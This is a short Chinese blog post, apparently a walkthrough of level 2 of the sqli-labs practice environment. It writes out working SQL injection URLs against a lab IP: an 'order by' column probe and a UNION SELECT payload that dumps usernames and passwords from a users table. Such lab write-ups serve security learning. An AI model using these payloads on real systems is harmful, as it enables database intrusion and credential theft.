Less-2
发布日期:2022-09-10 02:47:52
浏览次数:4
分类:博客文章
本文共 384 字,大约阅读时间需要 1 分钟。
Less-2
第二关:同样使用url传递参数id的值
(1)判断注入点
输入特殊字符,存在报错信息,发现这里未过滤且是id值是整型,区别于第一关的字符型
(2)进行字段和数据库信息注入
#查询字段数http://192.168.88.133/mysqli-labs/Less-2/?id=1 order by 4 --+#将4换成3显示正常 #后面的步骤和第一关的语句相同,去掉单引号即可,可以参考第一关的文章爆出用户信息 http://192.168.88.133/mysqli-labs/Less-2/?id=-1 union select 1,group_concat(username,0x3a,password,0x3c,0x62,0x72,0x2f,0x3e),3 from users--+
注:本人也在学习阶段,有错误或疑惑的地方欢迎指正和交流。
转载地址:https://www.cnblogs.com/stickonit/p/16049869.html 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!
发表评论
最新留言
很好
[***.229.124.182]2024年04月22日 14时29分28秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
【奇技淫巧】-- 三角形最小路径和
2019-04-27
【小技巧】argc和argv的用法
2019-04-27
学不下去了怎么办?
2019-04-27
二叉树的前中后序遍历(迭代法)(带动画)
2019-04-27
【小技巧】【XShell】【Xftp】Windows桌面与Linux虚拟机互传文件
2019-04-27
【redis入门】Centos下安装redis
2019-04-27
【redis入门】redis安装后相关知识串讲
2019-04-27
【redis】来吧,展示一下redis 发布-订阅模式
2019-04-27
当下热点词再学:redis缓存预热、更新、降级,限流
2019-04-27
【redis6.0.6】redis源码慢慢学,慢慢看 -- 第五天:adlist
2019-04-27
别抖,OK? 操作系统抖动现象、网络抖动与延迟、函数抖动之防抖与节流,串讲
2019-04-27
通过域名获取主机IP -- struct addrinfo
2019-04-27
【C++】算法集锦(8):从两数和问题拓展到一百数和问题
2019-04-27
【C++】算法集锦(9):背包问题
2019-04-27
【C++】算法集锦(10)通俗讲kmp算法
2019-04-27
【C++】算法集锦(12):高楼扔鸡蛋
2019-04-27
【图解】拥塞控制
2019-04-27
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 308155527 位访客
访问时间: 2024-04-26 22:10:16
访问IP: 3.137.185.180
Copyright © 2020 - 2023 blog.css8.cn 京ICP备2021015314号-1
手机版